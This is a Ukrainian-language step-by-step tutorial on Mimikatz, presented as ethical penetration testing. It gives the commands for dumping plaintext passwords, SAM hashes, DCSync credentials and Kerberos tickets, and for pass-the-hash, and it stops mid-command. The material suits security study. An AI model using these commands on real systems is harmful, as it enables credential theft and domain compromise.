Mimikatz – це потужний інструмент пост-експлуатації, призначений для вилучення з пам’яті відкритих паролів, хешів, PIN-кодів і квитків Kerberos. Він широко використовується тестувальниками проникнення і фахівцями з безпеки для оцінки вразливостей систем. Цей посібник надає покроковий підхід до встановлення та використання Mimikatz для етичного тестування безпеки.
Попередження: Несанкціоноване використання Mimikatz є незаконним. Переконайтеся, що у вас є дозвіл, перш ніж використовувати його в будь-якому середовищі.
Перед встановленням Mimikatz переконайтеся, що у вас є наступне:
Mimikatz – це інструмент з відкритим вихідним кодом, доступний на GitHub. Щоб завантажити його:
Крім того, ви можете клонувати сховище за допомогою Git’а:
git clone https://github.com/gentilkiwi/mimikatz.gitОскільки Mimikatz вимагає адміністративних привілеїв, виконайте ці кроки, щоб запустити його:
cd шлях\до\mimikatz\x64mimikatz.exemimikatz #.Перш ніж витягувати облікові дані, перевірте, чи маєте ви достатні привілеї:
privilege::debugЯкщо все пройшло успішно, ви повинні побачити Привілей '20' OK
Щоб витягти паролі з пам’яті у вигляді відкритого тексту, скористайтеся:
sekurlsa::logonpasswordsНа екран буде виведено ім’я користувача, домен і паролі у відкритому вигляді, якщо вони доступні.
Хеші NTLM можуть бути використані для атак типу “перехоплення хешу”. Щоб витягти їх, виконайте:
lsadump::samАбо, для віддалених систем:
lsadump::dcsync /domain:targetdomain.com /user:AdministratorДля отримання квитків Kerberos з системи:
sekurlsa::tickets /exportЕкспортує файли .kirbi, які можуть бути використані в атаках типу pass-the-ticket.
Для автентифікації за допомогою NTLM хешу замість пароля:
sekurlsa::pth /user:Administrator /domain:example.com /ntlm: